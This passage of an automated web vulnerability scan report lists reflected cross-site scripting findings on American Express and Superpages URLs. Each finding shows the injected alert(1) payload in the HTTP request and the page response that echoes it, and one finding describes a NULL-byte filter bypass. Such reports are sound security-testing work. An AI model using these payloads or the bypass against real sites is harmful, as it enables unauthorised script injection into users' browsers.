...[SNIP]...

1.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742121204958; path=/; expires=Sun, 07-Feb-16 14:08:41 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000zXlT7tO4dPEpQjTetmu9Wlt:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:41 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "8efe8";alert(1)//d1240e2685e=1";
   </script>
...[SNIP]...

1.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:32 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742112375272; path=/; expires=Sun, 07-Feb-16 14:08:32 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000ZIXNv3hxn7zFYSx2jAzWxLF:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:32 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?source=footer_small_business_credit_cards.d8dc2"><script>alert(1)</script>6a405ec230b" />
...[SNIP]...

1.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:38 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742118555633; path=/; expires=Sun, 07-Feb-16 14:08:38 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000BLrKMWo6FW5mWWeCqsNkbyV:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:38 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "source=footer_small_business_credit_cards3cde0";alert(1)//2536ed24016";
   </script>
...[SNIP]...

1.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /getthecard/home

Issue detail

The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:19 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="htt
...[SNIP]...
<script type="text/javascript">
var sj_responseText="";
var sj_rsvpStatus="";
var sj_offerURL="";
var sj_rsvpAttempts= 0;
var sj_pageContext="Prospect";
var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb;
var sj_modalToOpen = "null";
var sj_servername = "www201.americanexpress.com";
</script>
...[SNIP]...

1.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile87daf&quot;-alert(1)-&quot;1a7bb763e07/css/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=B99972F11C8DCBE31C71CEA0725DF8FE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:56 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css6d043&quot;-alert(1)-&quot;ea78a66d4f3/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=D39CC0F55EE6FF1DCB0F7AE681BEEEFC; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:04 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/busprofile.css14dd6&quot;-alert(1)-&quot;584c21ff5a6
Server: Unspecified
Set-Cookie: JSESSIONID=A0B8DA0925D4013D343773E12EB6B2B9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:12 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile46554&quot;-alert(1)-&quot;be25698ff9/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C43C42A2F651864B58C61C05BB832B63; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:58 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile46554"-alert(1)-"be25698ff9/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/cssb6866&quot;-alert(1)-&quot;0f304c70d9e/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=C18D83DEE8E4FAD1642CFA1B00191576; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:06 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/css/print.cssff3b0&quot;-alert(1)-&quot;0f9464b5bb7
Server: Unspecified
Set-Cookie: JSESSIONID=EB0CD557543B7B79EFDB0A2D65AFDA04; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:14 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile49cd4&quot;-alert(1)-&quot;96eceb6ffe4/js/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=E1DEBECF6D55BEE5047D715F190E5E85; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:11 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/jsb019f&quot;-alert(1)-&quot;5e23dbe0df5/busprofile.js
Server: Unspecified
Set-Cookie: JSESSIONID=91DA6ED19F90F3B9CFE832FC9D00294D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:20 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/busprofile.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile/js/busprofile.jsaf28c&quot;-alert(1)-&quot;d5cdefab79b
Server: Unspecified
Set-Cookie: JSESSIONID=C8CAA79C6FFF661580B5A8414F30FFC0; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:29 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofileedb86&quot;-alert(1)-&quot;af2b6080645/js/csiframe.js
Server: Unspecified
Set-Cookie: JSESSIONID=C289443CC4D1CCC15509FEB05BD2B338; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:08 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/js/csiframe.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

